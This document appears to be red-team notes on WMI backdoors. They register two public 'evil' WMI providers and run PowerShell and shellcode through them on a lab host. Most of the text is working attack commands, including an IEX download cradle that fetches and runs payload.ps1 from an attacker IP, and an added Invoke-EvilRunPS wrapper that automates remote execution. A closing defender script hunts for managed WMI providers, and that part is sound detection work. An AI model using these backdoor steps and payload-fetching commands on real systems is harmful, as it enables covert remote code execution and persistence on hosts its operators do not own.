Backdoor with WMI

Win32_LocalAdmins provider:

One of the earlier proof-of-concept evil WMI providers (a managed provider that exposes a custom class):

https://github.com/rzander/localadmins

Evil Network Connection WMI Provider (registers a Win32_NetConnection class whose RunPS method executes arbitrary PowerShell):

https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider

Open an elevated (administrator) command prompt in the build output directory (C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug) and register the provider with InstallUtil.exe. InstallUtil.exe ships with the .NET Framework (for example under %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\) and is not on PATH by default, so use the full path if the bare name is not found. Registration writes the class into the root\cimv2 repository and a COM CLSID for the assembly into the registry, which is why it needs admin rights:

C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug>InstallUtil.exe EvilNetConnectionWMIProvider.dll

In a second PowerShell window, list the Win32_Net* classes. Win32_NetConnection (the class the evil provider registers) now appears in the output alongside the legitimate ones:

PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_net* -list

PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_netconnection -name RunPS -ArgumentList "Get-Host"

The same method can be invoked from a non-elevated PowerShell session on another host. Note that the calling account still needs administrative (or explicitly granted DCOM and WMI namespace) rights on the target, since remote WMI enforces that before any method runs; what we gain is that the backdoor hides behind a legitimate-looking class name rather than a new service or scheduled task:

PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList "whoami"

PS C:\Users\victim6> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList "hostname"

PS C:\Users\victim6> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList "ipconfig"

To execute a PowerShell script hosted on the attacker's machine, pass the whole download cradle as a single string argument. The entire IEX expression must sit inside the quotes; if the DownloadString() call is left outside them, the calling host fetches and evaluates the script locally instead of handing it to the provider on the target:

PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList "IEX (New-Object Net.WebClient).DownloadString('http://192.168.222.131/payload.ps1')"
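The steps above (check that the class is registered on the target, then call RunPS with a correctly quoted command) wrapped into one reusable call. This is an added example, not code from these notes or from the EvilNetConnectionWMIProvider project; the target address, the payload URL and the assumption that RunPS hands the command's output back in the method's ReturnValue are illustrative.

```powershell
# Added example (not part of the original notes or of Jared Atkinson's
# EvilNetConnectionWMIProvider). Wraps the Win32_NetConnection.RunPS call so
# the whole PowerShell command travels as ONE string argument, and verifies
# that the backdoored class and its RunPS method exist on the target first.
# Host addresses, the payload URL and the ReturnValue assumption are illustrative.

function Invoke-EvilRunPS {
    param(
        [Parameter(Mandatory)] [string] $ComputerName,
        [Parameter(Mandatory)] [string] $Command,
        [System.Management.Automation.PSCredential] $Credential
    )

    # Parameters shared by every WMI call; -Credential is only added when one
    # was supplied, because the cmdlets reject an explicit $null credential.
    $wmi = @{ Namespace = 'root\cimv2'; ComputerName = $ComputerName }
    if ($Credential) { $wmi.Credential = $Credential }

    # 1. Is the evil provider's class registered on the target at all?
    #    A missing class means InstallUtil was never run there (or it was removed).
    $class = Get-WmiObject @wmi -List -Class 'Win32_NetConnection'
    if (-not $class) {
        throw "Win32_NetConnection is not registered on $ComputerName"
    }
    if (-not ($class.Methods | Where-Object Name -eq 'RunPS')) {
        throw "Win32_NetConnection on $ComputerName has no RunPS method"
    }

    # 2. Invoke RunPS. $Command is passed as a single array element so nested
    #    quotes and parentheses reach the provider intact.
    $result = Invoke-WmiMethod @wmi -Class 'Win32_NetConnection' -Name 'RunPS' -ArgumentList @($Command)

    # 3. Assumption: the sample provider's RunPS returns the script output as a
    #    string, which Invoke-WmiMethod exposes as ReturnValue.
    return $result.ReturnValue
}

# Build the download cradle as ONE string. A single-quoted here-string keeps the
# inner quotes literal and stops the calling host from evaluating
# DownloadString() locally (the quoting mistake this wrapper is meant to avoid).
$cradle = @'
IEX (New-Object Net.WebClient).DownloadString('http://192.168.222.131/payload.ps1')
'@

Invoke-EvilRunPS -ComputerName '192.168.222.130' -Command 'whoami'
Invoke-EvilRunPS -ComputerName '192.168.222.130' -Command $cradle
```

The class check is worth keeping in any tooling built around this: a target where the provider was removed (or never installed) otherwise fails with a generic "Invalid class" error that looks identical to a permissions problem.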

Another malicious provider: subTee's EvilWMIProvider, which registers a Win32_Evil class whose ExecShellcode method copies a byte array into executable memory and runs it.

https://github.com/subtee/EvilWMIProvider

Execute shellcode (the bytes are passed as an array; a harmless test payload should end with a ret, 0xC3, so the injected thread returns cleanly instead of running off the end of the buffer into unmapped memory and crashing the host process):

PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_evil -Name ExecShellcode -ArgumentList @(0x90,0x90,0x90,0xC3),$null
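Both providers above share the same footprint on the target: a __Win32Provider registration whose COM CLSID resolves to mscoree.dll (the .NET runtime host) with the assembly name stored beside it, typically loaded from a path outside the Windows directory. The defender-side check below lists every provider in a namespace, resolves its CLSID to the DLL that actually runs, flags those two traits, and then maps each flagged provider to the classes it serves. This is an added example and not code from these notes or from any of the linked projects; it runs against the local machine only, because the CLSID lookup reads the local registry.

```powershell
# Added example (not part of the original notes or of the linked providers):
# hunt for managed or out-of-place WMI providers on the local host.

function Get-SuspiciousWmiProvider {
    param([string] $Namespace = 'root\cimv2')

    $systemRoot = $env:SystemRoot

    Get-WmiObject -Namespace $Namespace -Class '__Win32Provider' | ForEach-Object {
        $provider = $_

        # Providers registered through InstallUtil (as above) are COM servers
        # whose InprocServer32 is mscoree.dll; the managed assembly is recorded
        # in the Assembly value next to it. Native providers point at their DLL.
        $clsidKey = "HKLM:\SOFTWARE\Classes\CLSID\$($provider.CLSID)\InprocServer32"
        $dll = $null
        $assembly = $null
        if (Test-Path $clsidKey) {
            $reg = Get-ItemProperty -Path $clsidKey
            $dll = $reg.'(default)'
            $assembly = $reg.Assembly
        }
        # Built-in providers use %systemroot%\... paths, so expand before comparing.
        $dllExpanded = if ($dll) { [Environment]::ExpandEnvironmentVariables($dll) } else { '' }

        $reasons = @()
        if ($dllExpanded -match 'mscoree\.dll$') {
            $reasons += 'managed (.NET) provider'
        }
        if ($dllExpanded -and -not $dllExpanded.StartsWith($systemRoot, 'OrdinalIgnoreCase')) {
            $reasons += 'DLL outside %SystemRoot%'
        }

        [pscustomobject]@{
            Name         = $provider.Name
            CLSID        = $provider.CLSID
            HostingModel = $provider.HostingModel
            Dll          = $dllExpanded
            Assembly     = $assembly
            Suspicious   = ($reasons.Count -gt 0)
            Reason       = ($reasons -join '; ')
        }
    }
}

# Which classes does a provider back? Classes carry a "provider" qualifier
# naming their __Win32Provider, so enumerate the namespace and match on it.
function Get-WmiClassesForProvider {
    param(
        [Parameter(Mandatory)] [string] $ProviderName,
        [string] $Namespace = 'root\cimv2'
    )
    Get-WmiObject -Namespace $Namespace -List |
        Where-Object {
            $_.Qualifiers | Where-Object { $_.Name -eq 'provider' -and $_.Value -eq $ProviderName }
        } |
        Select-Object -ExpandProperty Name
}

# Report: flagged providers first, then the classes each one serves.
$hits = Get-SuspiciousWmiProvider | Where-Object Suspicious
$hits | Format-Table Name, HostingModel, Dll, Assembly, Reason -AutoSize
foreach ($hit in $hits) {
    foreach ($className in Get-WmiClassesForProvider -ProviderName $hit.Name) {
        '{0} -> {1}' -f $hit.Name, $className
    }
}
```

On a default Windows install the managed-provider check normally returns nothing, which is what makes it a useful baseline; a hit such as a provider backing Win32_NetConnection or Win32_Evil is exactly the artifact the two projects above leave behind. Match the class list against the MOF files that ship with Windows under %SystemRoot%\System32\wbem before treating a native hit as malicious.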

@Saksham Dixit